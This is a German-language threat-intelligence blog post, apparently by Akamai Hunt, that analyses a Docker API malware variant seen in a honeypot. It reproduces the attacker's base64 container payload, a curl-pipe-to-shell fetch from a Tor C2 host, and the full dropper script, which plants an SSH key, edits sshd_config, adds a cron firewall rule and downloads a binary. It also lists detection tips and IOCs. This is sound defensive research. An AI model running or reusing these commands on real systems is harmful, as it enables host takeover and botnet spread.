Zusammenfassung
Das Akamai Hunt-Team hat eine neue Malware-Variante entdeckt, die exponierte Docker-APIs mit erweiterten Infektionsfunktionen angreift. Sie tauchte zuletzt im August 2025 in der Honeypot-Infrastruktur von Akamai auf.
Die Malware wurde erstmalig im Juni 2025 vom Threat Intelligence Team von Trend Micro gemeldet. Die gefundene Iteration hat einen Cryptominer hinter einer Tor-Domain abgelegt.
Das Akamai Hunt-Team hat eine Variante beobachtet, die einen anderen ursprünglichen Angriffsvektor hat – sie blockiert anderen den Zugriff auf die Docker-API aus dem Internet.
Auch die Binärdatei unterscheidet sich: Die von Akamai Hunt entdeckte Variante legt keinen Cryptominer ab, sondern eine Datei, die andere zuvor verwendete Tools sowie Infektionsfunktionen enthält, die jene der ursprünglichen Variante übertreffen.
Dieser Blogbeitrag enthält alle technischen Details zu den ersten Erkenntnissen, den Unterschieden zwischen den beiden Varianten und den Indikatoren für Kompromittierung (IOCs), die bei der Abwehr dieser Bedrohung helfen.
Einführung
Je stärker unsere digitalen Ökosysteme miteinander vernetzt sind, desto mehr Möglichkeiten zum Verstecken haben Angreifer, unter anderem durch eine Modifikation im Falle einer Entdeckung. Wenn ein neuer Bedrohungsvektor oder eine neue Malware-Variante entdeckt und gemeldet wird, kann es nur wenige Stunden oder Tage dauern, bis ein Angreifer diese Malware so modifiziert, dass sie erneut der Erkennung entgeht.
Das Akamai Hunt-Team hat eine neue aktive Kampagne aufgedeckt, bei der exponierte Docker-APIs angegriffen werden. Diese neue Variante scheint ähnliche Werkzeuge wie das Original zu verwenden, könnte jedoch ein anderes Endziel verfolgen – etwa die Schaffung der Grundlage für ein komplexes Botnet.
In diesem Blogbeitrag werden die technischen Details, die Angriffskette und die Maßnahmen zur Abwehr dieser Malware-Variante erläutert.
Die erste Bedrohung – eine kurze Zusammenfassung
Im Juni 2025 berichtete das Threat Intelligence Team von Trend Micro über Malware, die offenliegende Remote-Docker-APIs angriff, um einen Cryptominer abzulegen. Die Autoren der Malware verwendeten Tor auch, um ihre Identität zu verschleiern.
Die Angreifer verschafften sich zunächst Zugang, indem sie fehlkonfigurierte Docker-APIs angriffen, wodurch sie einen neuen Container auf Basis des Alpine-Docker-Images ausführen und das Dateisystem des Hosts darin mounten konnten. Anschließend wurde eine Base64-codierte Payload ausgeführt, die ein schädliches Shell-Skript von einem .onion-Server herunterlud, das die SSH-Konfigurationen auf dem Host für eine dauerhafte Verbindung änderte.
Der Downloader installierte außerdem verschiedene Tools, darunter masscan und torsocks, und übermittelte Systeminformationen über Tor an den Command-and-Control-Server (C2) der Angreifer. Die Angreifer luden anschließend eine Zstandard-komprimierte Binärdatei mit einem XMRig-Kryptowährungs-Miner herunter und führten sie aus.
Unsere Ermittlungen
Im Rahmen einer Routineüberprüfung haben wir eine HTTP-Anfrage an unsere Docker-API von mehreren IP-Adressen entdeckt, die versuchte, auf einem unserer Server einen neuen Container zu erstellen (Abbildung 1). Dies weckte unser Interesse und wir begannen mit den Nachforschungen.
{
"Image": "alpine:latest",
"Cmd": [
"sh",
"-c",
"export IP=<honeypot_ip>; echo YXBrIHVwZGF0ZSAmJiBhcGsgYWRkIGN1cmwgdG9yICYmIHRvciAmIHdoaWxlICEgY3VybCAtZnMgLS1wcm94eSBzb2NrczVoOi8vbG9jYWxob3N0OjkwNTAgaHR0cHM6Ly9jaGVja2lwLmFtYXpvbmF3cy5jb207IGRvIHNsZWVwIDEwOyBkb25lOyBjdXJsIC1mcyAtLXByb3h5IHNvY2tzNWg6Ly9sb2NhbGhvc3Q6OTA1MCBodHRwOi8vd3R4cWY1NGRqaHA1cHNrdjJsZnlkdXViNWlldnhieXZsempnam9wazZoeGdlNXVtb21icjYzYWQub25pb24vc3RhdGljL2RvY2tlci1pbml0LnNoIHwgc2g= | base64 -d | sh"
],
"Tty": true,
"HostConfig": {
"Binds": [
"/:/hostroot:rw"
],
"RestartPolicy": {
"MaximumRetryCount": 0,
"Name": "always"
}
}
}Der Angreifer hat das Dateisystem des Hosts gemountet und ein Base64-codiertes Skript ausgeführt. Dies war ein ungewöhnliches Verhalten, das weitere Untersuchungen erforderlich machte, um das Ziel des neu erstellten Containers aufzudecken. Nach der Decodierung der Probe stellten wir fest, dass das Ziel darin bestand, den Container einzurichten und ein Skript aus einer Tor-Domain abzurufen (Abbildung 2).
apk update && apk add curl tor && tor & while ! curl -fs --proxy socks5h://localhost:9050 https://checkip.amazonaws.com; do sleep 10; done; curl -fs --proxy socks5h://localhost:9050 http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion/static/docker-init.sh | shDieses Skript besteht aus zwei Phasen:
- Phase 1: Vorbereitung der Umgebung
- Installiert curl und tor
- Startet einen Tor-Daemon im Hintergrund
- Erhält die öffentliche IP des Opfers über checkip.amazonaws.com
- Phase 2: Abruf und Ausführung
- Ruft ein Skript mit dem Namen docker-init.sh aus einer Tor-Domain ab (Abbildung 3)
#!/bin/sh
echo "Karuizawa running..."
if [ -d "/hostroot" ]; then
SC="/hostroot/etc/ssh/sshd_config";{ printf "PermitRootLogin yes\nPubkeyAuthentication yes\n"; cat $SC; } > t.txt && mv t.txt $SC && echo "ecdsa-sha2-nistp521 AAAAE2VjZHNhLXNoYTItbmlzdHA1MjEAAAAIbmlzdHA1MjEAAACFBAHTVlJAQr3MiANW6KZjiPrzlIsVXkATKxKGrwFM4ylE31c4psnz1NdsKVSG7mVmB3bjmBRL3d4JmpKNByGPXeF9LgAOU4t5Olcwhl0x+ci8zwg6xV+dq/YABOxNZr5MI1dVfkmZ86+iGRnt03TB28n0RH1zbJ+x21jw5iJSwoUe+rkD1A==" >> /hostroot/root/.ssh/authorized_keys
echo "* * * * * root echo 'aWYgY29tbWFuZCAtdiBzeXN0ZW1jdGwgJj4gL2Rldi9udWxsOyB0aGVuCiAgICBzeXN0ZW1jdGwgcmVsb2FkIHNzaGQgMj4vZGV2L251bGwgfHwgc3lzdGVtY3RsIHJlbG9hZCBzc2gKZWxpZiBbIC14IC9ldGMvaW5pdC5kL3NzaCBdOyB0aGVuCiAgICAvZXRjL2luaXQuZC9zc2ggcmVsb2FkCmVsaWYgWyAteCAvZXRjL2luaXQuZC9zc2hkIF07IHRoZW4KICAgIC9ldGMvaW5pdC5kL3NzaGQgcmVsb2FkCmVsc2UKICAgIGVjaG8gImVyciIKZmkKClBPUlQ9MjM3NQpQUk9UT0NPTD10Y3AKCmZvciBmdyBpbiBmaXJld2FsbC1jbWQgdWZ3IHBmY3RsIGlwdGFibGVzIG5mdDsgZG8KICBpZiBjb21tYW5kIC12ICIkZnciID4vZGV2L251bGwgMj4mMTsgdGhlbgogICAgY2FzZSAiJGZ3IiBpbgogICAgICBmaXJld2FsbC1jbWQpCiAgICAgICAgZmlyZXdhbGwtY21kIC0tcGVybWFuZW50IC0tem9uZT1wdWJsaWMgLS1hZGQtcmljaC1ydWxlPSJydWxlIGZhbWlseT0naXB2NCcgcG9ydCBwb3J0PScke1BPUlR9JyBwcm90b2NvbD0nJHtQUk9UT0NPTH0nIHJlamVjdCIKICAgICAgICBmaXJld2FsbC1jbWQgLS1yZWxvYWQKICAgICAgICA7OwogICAgICB1ZncpCiAgICAgICAgdWZ3IGRlbnkgIiR7UE9SVH0vJHtQUk9UT0NPTH0iCiAgICAgICAgdWZ3IHJlbG9hZAogICAgICAgIDs7CiAgICAgIHBmY3RsKQogICAgICAgIGVjaG8gImJsb2NrIGRyb3AgcHJvdG8gJHtQUk9UT0NPTH0gZnJvbSBhbnkgdG8gYW55IHBvcnQgJHtQT1JUfSIgfCBwZmN0bCAtYSBjdXN0b21fYmxvY2sgLWYgLQogICAgICAgIDs7CiAgICAgIGlwdGFibGVzKQogICAgICAgIGlwdGFibGVzIC1JIElOUFVUIDEgLXAgIiR7UFJPVE9DT0x9IiAtLWRwb3J0ICIke1BPUlR9IiAtaiBEUk9QCiAgICAgICAgOzsKICAgICAgbmZ0KQogICAgICAgIGlmICEgbmZ0IGxpc3QgdGFibGVzIHwgZ3JlcCAtcSAiaW5ldCI7IHRoZW4KICAgICAgICAgIG5mdCBhZGQgdGFibGUgaW5ldAogICAgICAgICAgbmZ0IGFkZCBjaGFpbiBpbmV0IGZpbHRlciB7IHR5cGUgZmlsdGVyIGhvb2sgaW5wdXQgcHJpb3JpdHkgMCBcOyB9CiAgICAgICAgZmkKICAgICAgICBuZnQgYWRkIHJ1bGUgaW5ldCBmaWx0ZXIgaW5wdXQgIiR7UFJPVE9DT0x9IiBkcG9ydCAiJHtQT1JUfSIgZHJvcAogICAgICAgIDs7CiAgICBlc2FjCiAgICBicmVhawogIGZpCmRvbmUKCmVjaG8gIiIgPiAvZXRjL2Nyb250YWIK' | base64 -d | sh" >> /hostroot/etc/crontab
fi
apk add masscan libpcap libpcap-dev zstd torsocks
curl --proxy socks5h://localhost:9050 http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion/bot/add -X POST -H "Content-Type: application/json" -d '{"enter": "docker", "ip": "'$IP'", "arch": "'$(uname -m)'" }'
torsocks wget -O /tmp/system.zst "http://2hdv5kven4m422wx4dmqabotumkeisrstzkzaotvuhwx3aebdig573qd[.]onion:9000/binary/system-linux-$(uname -m).zst"
zstd -d /tmp/system.zst -o /tmp/system
chmod +x /tmp/system
ulimit -n 65535
/tmp/system
sleep 30Analyse von docker-init.sh
Die Analyse des Skripts in Abbildung 3 zeigt, dass es mehrere Persistenz- und Abwehrumgehungsmaßnahmen durchführt, darunter die Verweigerung des weiteren Zugriffs auf die exponierte Instanz, was wir bei früheren Varianten noch nicht gesehen haben.
Root-Persistenz über SSH: Das Skript hängt einen vom Angreifer gesteuerten öffentlichen Schlüssel an /root/.ssh/authorized_keys an.
Installation: Anschließend fügt das Skript Tools für Verbreitung, Persistenz und Umgehung hinzu (masscan, libpcap, libcap-dev, zstd und torsocks).
- Zugriff kontrollieren: Durch Schreiben des Base64-codierten Befehls im Skript in /hostroot/etc/crontab erstellt der Angreifer einen cron-Job, der jede Minute ausgeführt wird und mehrere Firewall-Utilitys durchgeht (firewall-cmd, ufw, pfctl, iptables, nft), um den Zugriff auf Port 2375 (die Docker-API; Abbildung 4) zu blockieren.
PORT=2375
PROTOCOL=tcp
for fw in firewall-cmd ufw pfctl iptables nft; do
if command -v "$fw" >/dev/null 2>&1; then
case "$fw" in
firewall-cmd)
firewall-cmd --permanent --zone=public --add-rich-rule="rule family='ipv4' port port='${PORT}' protocol='${PROTOCOL}' reject"
firewall-cmd --reload
;;
ufw)
ufw deny "${PORT}/${PROTOCOL}"
ufw reload
;;
pfctl)
echo "block drop proto ${PROTOCOL} from any to any port ${PORT}" | pfctl -a custom_block -f -
;;
iptables)
iptables -I INPUT 1 -p "${PROTOCOL}" --dport "${PORT}" -j DROP
;;
nft)
if ! nft list tables | grep -q "inet"; then
nft add table inet
nft add chain inet filter { type filter hook input priority 0 \; }
fi
nft add rule inet filter input "${PROTOCOL}" dport "${PORT}" drop
;;
esac
break
fi
doneDie crontab-Datei befindet sich auf dem Host selbst, da der Angreifer sie beim Erstellen des Containers gemountet hat. Dies ist eine Überlegenheitstaktik, d. h. der Angreifer sperrt das Opfer zur ausschließlichen eigenen Nutzung und verweigert anderen Angreifern den weiteren Zugriff auf die exponierte Instanz. Dies ist ein neuer Abschnitt im Code, den wir in früheren Varianten nicht gesehen haben und der derzeit in VirusTotal nicht erkannt wird.
Der Angreifer sendet dann eine POST-Anforderung zurück an seinen C2-Server, was darauf hinweist, dass ein Docker-Dienst kompromittiert wurde (Abbildung 5).
curl --proxy socks5h://localhost:9050 http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion/bot/add -X POST -H "Content-Type: application/json" -d '{"enter": "docker", "ip": "'$IP'", "arch": "'$(uname -m)'" }'Sobald die Kommunikation mit dem C2 hergestellt ist, lädt das Skript eine komprimierte Binärdatei von einem anderen Tor-Dienst herunter (Abbildung 6).
torsocks wget -O /tmp/system.zst "http://2hdv5kven4m422wx4dmqabotumkeisrstzkzaotvuhwx3aebdig573qd[.]onion:9000/binary/system-linux-$(uname -m).zst"Analyse der Binärdatei
Die erste Datei, die heruntergeladen wird, ist ein in Go geschriebener Dropper, der den Inhalt enthält, den er ablegen möchte, sodass er nicht mit dem Internet kommuniziert.
Außer dem Ablegen einer anderen Binärdatei wird die Datei utmp analysiert, um zu ermitteln, wer aktuell an dem Computer angemeldet ist.
Abbildung 7 zeigt den Dropper mit einem „Nutzer“-Emoji. Dies ist ein interessantes Artefakt, da es wahrscheinlich darauf hindeutet, dass er mithilfe eines großen Sprachmodells (LLM) geschrieben wurde, von denen viele Emojis in ihren Code integrieren.
Die abgelegte Datei (dockerd) führt masscan aus, ein Port-Scan-Tool, das ideal für großflächige Scans wie diesen verwendet wird (Abbildung 8). Es sucht nach anderen offenen 2375-Ports (Docker-API-Dienste). Wenn einer gefunden wird, versucht es, die API mit der gleichen Methode zu infizieren, indem es einen Container mit dem in Abbildung 1 gezeigten Base64-Befehl erstellt.
Während die ersten beiden Endpunkte (Get, Start) für die Malware-Ausbreitung verwendet werden, scheinen die letzten beiden (Stop, Remove) zur Identifizierung schädlicher Container zu dienen, die von anderen Angreifern eingesetzt werden (Abbildung 9).
Diese Identifizierung erfolgt durch die Suche nach ubuntu-Containern, da unsere Daten zeigen, dass viele Bedrohungsakteure ubuntu-Container einsetzen, die Cryptominer enthalten. Die meisten unserer Honeypot-Vorfälle umfassten einen Erstzugriff über einen ubuntu- oder alpine-Container, gefolgt von einem curl-Zugriff auf eine schädliche Domain zum Herunterladen einer Malware.
Auf der Suche nach Freunden
Diese Variante begnügt sich jedoch nicht mit einer Erstinfektion. Der Bedrohungsakteur verwendet denselben Base64-Befehl, den wir in Abbildung 1 gesehen haben, zusammen mit anderen Parametern, um einen neuen schädlichen Container auf dem exponierten Ziel zu erstellen, das im Zuge der masscan-Ausführung gefunden wurde (Abbildung 10).
Obwohl masscan nur Port 2375 scannt, enthält die Binärdatei auch Überprüfungen für zwei weitere Ports – 23 (Telnet) und 9222 (Remote-Debugging-Port für Chromium-Browser) – anscheinend mit Infektionstechniken für jeden dieser Ports.
Soweit wir das beurteilen können, ist die Logik für die Verarbeitung der Ports 23 und 9222 derzeit nicht erreichbar und wird nicht ausgeführt, da die Malware nur nach Port 2375 sucht. Die Implementierung ist jedoch vorhanden, was auf zukünftige Fähigkeiten hinweisen kann.
Port 23
Für Port 23 (Telnet) verwendet die Malware einen Satz bekannter Standard-Router und Geräteanmeldeinformationen (z. B. Alphanetworks:wrgg15_di524 oder PSEAdmin:$secure$). Sie protokolliert die erfolgreichen Anmeldungen und sendet diese an einen webhook[.]site-Endpunkt (4fea5cbb-8863-4f25-862a-fd8f02095207) mit der Ziel-IP-Adresse und den Zugangsdaten des Opfers.
Interessanterweise wird auch davon ausgegangen, dass es sich um einen Honeypot handelt, wenn die Anmeldung mit Nutzer ‘root’ erfolgreich war. Diese Annahme basiert wahrscheinlich auf der Tatsache, dass Telnet root-Anmeldungen mit der Standardkonfiguration ignoriert (Abbildung 11).
Port 9222
Port 9222 ist der standardmäßige Remote-Debugging-Port für Google Chrome und Chromium, der zur Darstellung des DevTools-Protokolls verwendet wird. Bleibt er ohne Schutz im Internet offen, kann dies eine Fernsteuerung des Browsers ermöglichen und ein Sicherheitsrisiko darstellen.
Die Malware verwendet chromedp, eine Go-Bibliothek, die mit Chrome- oder Chromium-Browsern interagiert. Diese wurde in der Vergangenheit missbraucht, um die anwendungsspezifische Verschlüsselungsfunktion von Chrome zu umgehen, eine Remoteverbindung zu Chromium-Sitzungen herzustellen und Cookies sowie andere private Daten zu stehlen.
In unserer Variante verwendet die Malware NewRemoteAllocator und NewContext mit dem Parameter http://<scanned_ip>:9222, um sich an eine bestehende Sitzung mit dem offenen Remote-Port anzuhängen (Abbildung 12).
Sie navigiert zu http://checkip.amazonaws.com und fragt den Body der Seite ab. Abgesehen von dieser Handlung haben wir keine andere Aktivität in diesem Vektor gesehen. Wir konnten auch keine komplexeren Versionen dieser Malware finden.
Wenn der Body erfolgreich abgerufen wurde, ruft die Malware eine Funktion namens addHttpbot auf, die eine POST-Anforderung von der angegebenen IP an http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion/httpbot/add sendet (beachten Sie das http-Endpunkt-Präfix), wobei sich die Quell-IP-Adresse der Malware und das Ziel, zu dem sie Zugang fand, auf Port 9222 befinden.
Theoretisch könnte der Angreifer in zukünftigen Varianten nach dem Zugriff auf einen Remote-Debugging-Port mehrere böswillige Handlungen ausführen, darunter:
- Diebstahl sensibler Daten wie Cookies oder Kreditkartennummern
- externer Zugriff auf eingeschränkte Informationen wie z. B. Cloud-Metadaten
- Durchführung von DDoS-Angriffen (Distributed Denial of Service)
- Download von Remote-Daten
Es ist auch wichtig zu beachten, dass beim Freigeben eines Chrome-Browsers über --remote-debugging-port standardmäßig nur Anfragen von localhost berücksichtigt werden. Jeder, der diesen Port im Internet freigibt, muss die --remote-debugging-address ausdrücklich festlegen.
Die Datei fragt auch ip-api ab, um deren ASN und Standort zu ermitteln, insbesondere mit einer Funktion namens IsAWSIP, obwohl wir keine Hinweise auf einen konkreten Missbrauch von AWS oder weitere damit zusammenhängende Logik gefunden haben. Die Logik könnte in einer zukünftigen Version der Malware enthalten sein.
Einige der zugrunde liegenden Mechanismen lassen uns glauben, dass es sich bei dieser Variante um eine anfängliche Version eines komplexen Botnets handelt, wir haben jedoch bisher keine vollständige Version gefunden.
Die Bedrohung erkennen
Sie können eine beliebige Kombination folgender Techniken verwenden, um potenzielle Infektionen durch diese Malware oder andere ähnliche Vektoren zu erkennen:
Suchen Sie nach neu bereitgestellten Containern, die eine Installer-App (wie apt oder yum) und dann unmittelbar danach einen Downloader (wie curl oder wget) ausführen. Viele Angreifer verwenden diese Methode zur Remote-Ausführung von Code auf exponierten Docker-Instanzen.
Suchen Sie nach neuen Verbindungen vom Internet zu den Ports 2375, 9222 oder 23. Zudem kann die Verwendung von Scan-Tools in Ihrem Netzwerk auf Erkundungsaktivitäten hinweisen.
Überwachen Sie Base64-kodierte Befehle und überprüfen Sie, ob Anomalien hinsichtlich des Ortes ihrer Ausführung, des ausführenden Nutzers und natürlich des dekodierten Inhalts dieser Befehle vorliegen.
Überwachen Sie Downloader-Anwendungen. Das Erkennen von ungewöhnlichen Zugriffen auf verdächtige Domains aus solchen Prozessen ist entscheidend für die Erkennung von Erstzugriffen aus dem Internet.
Suchen Sie nach Hauptdiensten, die nicht mehr lauschen. Wenn es in Ihrer Umgebung einen Dienst gibt, der kontinuierlich auf einem Port lauscht und plötzlich ohne Grund damit aufhört, kann dies verdächtig sein.
Sehen Sie sich die neuen Container an, die mit dem Dateisystem des Hosts gemountet wurden. Wenn ein neu bereitgestellter Container mit Zugriff auf sensible Hostpfade gestartet wird (z. B. /, /var/run/docker.sock, /etc), kann dies auf einen Versuch hinweisen, die Containergrenze zu verlassen oder erweiterte Rechte auf dem Host zu erlangen.
Akamai Hunt-Kunden profitieren von einer kontinuierlichen Überwachung rund um die Uhr, die sicherstellt, dass Anomalien wie diese schnell erkannt und untersucht werden, bevor sie zu echten Bedrohungen eskalieren können.
Prävention und Schadensbegrenzung
Ganz gleich, ob Sie eine Infektion entdecken oder versuchen, eine Infektion von Anfang an zu verhindern, können diese vier Vorschläge dazu beitragen, Ihre Umgebung sicherer zu machen.
Netzwerksegmentierung: Isolieren Sie Ihre Docker-Umgebung von anderen Teilen Ihres Netzwerks. Verwenden Sie Netzwerksegmentierung, um die Möglichkeiten von Angreifern, sich innerhalb Ihrer Infrastruktur seitlich zu bewegen, einzuschränken und den Zugriff auf die Docker-API zu beschränken.
Exposition: Exponieren Sie so wenige Dienste wie möglich im Internet. Diese Malware nutzt die Ports 2375, 9222 und 23 aus, indem sie über das Internet darauf zugreift, und das Blockieren eines solchen Zugriffs kann die Bedrohung vollständig abwehren.
Chrome-Debugger-Port: Wenn Sie den Chrome-Debugger-Port (9222) verwenden, verwenden Sie konkrete Remote-IP-Adressen – nicht 0.0.0.0.
Regelmäßiger Passwortwechsel: Wenn Sie ein neues Gerät installieren, ändern Sie die Standardzugangsdaten in ein sicheres Passwort.
Technik-Spotlight: Projekt Beelzebub
Für den Honeypot, in dem diese Variante entdeckt wurde, nutzten wir die Architektur des großartigen Beelzebub-Honeypot-Projekts von Mario Candela.
Beelzebub ist ein Open-Source-Honeypot-Framework, mit dem sich Dienste mit hoher Interaktion mit minimalem Aufwand seitens der Forschenden einfach simulieren lassen. Durch das Schreiben einfacher YAML-Dateien für jeden Dienst können ganze Protokolle oder APIs basierend auf Anforderungs-/Antwortmustern simuliert werden (Abbildung 13).
Es gibt auch die Möglichkeit, ein LLM einzubinden, um dynamische Reaktionen zu generieren, sodass Angreifer denken, dass sie mit einer API kommunizieren, es sich jedoch tatsächlich um ein LLM handelt, das die Antwort der echten API imitiert.
- regex: "^/_ping/?$"
headers:
- "Content-Type: text/plain; charset=utf-8"
- "Server: Docker/24.0.7 (linux)"
- "Api-Version: 1.43"
- "Docker-Experimental: false"
- "Ostype: linux"
statusCode: 200
handler: "OK"Dieses Snippet teilt Beelzebub mit, wie reagiert werden soll, wenn ein Angreifer den /_ping-Endpunkt der Docker-API abfragt. Anstatt die Anforderung zu ignorieren, antwortet der Honeypot mit Headern und Metadaten, die ihn wie einen echten Docker-24.0.7-Server unter Linux aussehen lassen. Der Handler gibt ein einfaches „OK“ zurück, genau wie ein echter Docker-Daemon.
Sie finden unsere vollständige Docker-API-YAML-Datei auf unserem GitHub-Repository.
Auf der Suche nach proaktiver Überwachung?
Diese neu entdeckte Docker-Malware-Variante unterstreicht die Notwendigkeit, dass die Forschungsgemeinschaft ihre wertvolle Arbeit zur Unterstützung von Verteidigern weiterführen muss. Angreifer sind weiterhin einen Schritt voraus – oft indem sie bekannte Bedrohungen oder Schwachstellen nutzen und diese gerade so weit anpassen, dass sie unentdeckt bleiben, oder, schlimmer noch, indem sie sich so aufstellen, dass sie später noch größeren Schaden anrichten können.
Angreifer können erhebliche Kontrolle über von missbrauchten APIs betroffene Systeme erlangen. Die Bedeutung der Segmentierung von Netzwerken, der Begrenzung des Zugriffs auf Dienste im Internet und der sicheren Gestaltung von Standardzugangsdaten kann nicht genug betont werden. Durch die Umsetzung dieser Maßnahmen können Unternehmen ihre Anfälligkeit gegenüber solchen Bedrohungen erheblich reduzieren.
Das Akamai Hunt-Team überwacht und berichtet weiterhin über Ergebnisse aus realen Vorfällen, um unsere Kunden und die Sicherheitscommunity im Allgemeinen zu schützen. Folgen Sie uns in den sozialen Medien oder auf unserer zentralen Forschungsseite, um über die neuesten Erkenntnisse von Hunt und dem restlichen Ökosystem der Security Intelligence Group von Akamai auf dem Laufenden zu bleiben.
IOCs
IOC |
Typ |
|---|---|
wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion |
Domain |
2hdv5kven4m422wx4dmqabotumkeisrstzkzaotvuhwx3aebdig573qd[.]onion |
Domain |
webhook[.]site/4fea5cbb-8863-4f25-862a-fd8f02095207 |
URL |
C38e013ed9aa1ef46411bef9605f7a41823f3eefebb8b30b9e35f39723c14d7c - docker-init.sh |
Hash |
649974453ed40b72d08d378d72d43161ed5bd093a4f80eb5285f75e16fedbeb2 - system |
Hash |
9451d3dc4b0ff9ea6afa503ffbfcd877944cac0860d6a0b8779c2bb5d03d3446 - dockerd |
Hash |
Was ist Akamai Hunt?
Akamai Hunt ist ein proaktiver, praxisorientierter Service zur Bedrohungssuche, der kontinuierlich nach Anomalien und potenziellen Bedrohungen sucht und eine schnelle Erkennung und Untersuchung gewährleistet, bevor diese zu echten Bedrohungen eskalieren.
Wir haben Einblick in die neuesten Techniken, Tools und Verhaltensweisen von Angreifern, unterstützt durch die umfangreiche Honeypot-Infrastruktur von Akamai und die direkte Interaktion mit den Umgebungen unserer Kunden. So können wir Annahmen anhand realer Aktivitäten von Angreifern überprüfen, unsere Erkennungsmethoden durch Informationen aus erster Hand ergänzen und Bedrohungen antizipieren, bevor sie die Umgebungen unserer Kunden erreichen.
Tags
